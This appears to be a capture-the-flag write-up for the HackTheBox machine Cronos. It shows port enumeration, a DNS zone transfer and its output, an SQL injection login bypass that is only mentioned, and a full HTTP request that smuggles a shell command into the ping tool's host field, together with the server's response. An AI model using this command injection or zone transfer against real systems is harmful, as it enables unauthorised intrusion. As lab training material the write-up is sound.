# Enumeration
The enumeration results show 3 open ports:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
So, we are dealing with an Ubuntu machine that is hosting a WebApp. Port 53 is also open and an ISC BIND service running. Let's research on it a little bit more.
[ISC Bind 9](https://www.isc.org/bind/) has evolved to be a very flexible, full-featured DNS system. Whatever your application is, BIND 9 probably has the required features. As the first, oldest, and most commonly deployed solution, there are more network engineers who are already familiar with BIND 9 than with any other system.
I was having problems connecting to the web service so I added the IP to the /etc/hosts file. ![[Pasted image 20210413095138.png]]
# DNS Enumeration (link)
Check out the video from hackersploit and learn about dns enumeration and zone transfers to understand the following lines.
$ dig axfr @10.10.10.13 cronos.htb
; <<>> DiG 9.16.2-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 28 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Apr 13 07:09:07 UTC 2021
;; XFR size: 7 records (messages 1, bytes 203)
I have found a couple of domains linked to cronos. Let's add them to the /etc/hosts file too in order to access them on the browser.
![[Pasted image 20210413101836.png]]
# Admin.cronos.htb & SQLi
![[Pasted image 20210413101925.png]]
A Quick SQLi check let's us in.
![[Pasted image 20210413102037.png]]
Two tools are running on the welcome.php page. *Ping* and *traceroute*. From Burp, I have poked the application and discovered command injection.### Request
POST /welcome.php HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://admin.cronos.htb
DNT: 1
Connection: close
Referer: http://admin.cronos.htb/welcome.php
Cookie: PHPSESSID=huubsof4d0e5ged45ge0gflp26
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
command=traceroute&host=8.8.8.8%3Bls+.
I have encoded a semicolon and added the ls command for the current directory.
### Response
HTTP/1.1 200 OK
Date: Tue, 13 Apr 2021 08:01:47 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 527
Connection: close
Content-Type: text/html; charset=UTF-8
<html">
<head>
<title>Net Tool v0.1 </title>
</head>
<body>
<h1>Net Tool v0.1</h1>
<form method="POST" action="">
<select name="command">
<option value="traceroute">traceroute</option>
<option value="ping -c 1">ping</option>
</select>
<input type="text" name="host" value="8.8.8.8"/>
<input type="submit" value="Execute!"/>
</form>
config.php<br>
index.php<br>
logout.php<br>
session.php<br>
welcome.php<br>
<p><a href = "logout.php">Sign Out</a></p>
</body>
</html>
0 Comments
Recommended Comments
Няма коментари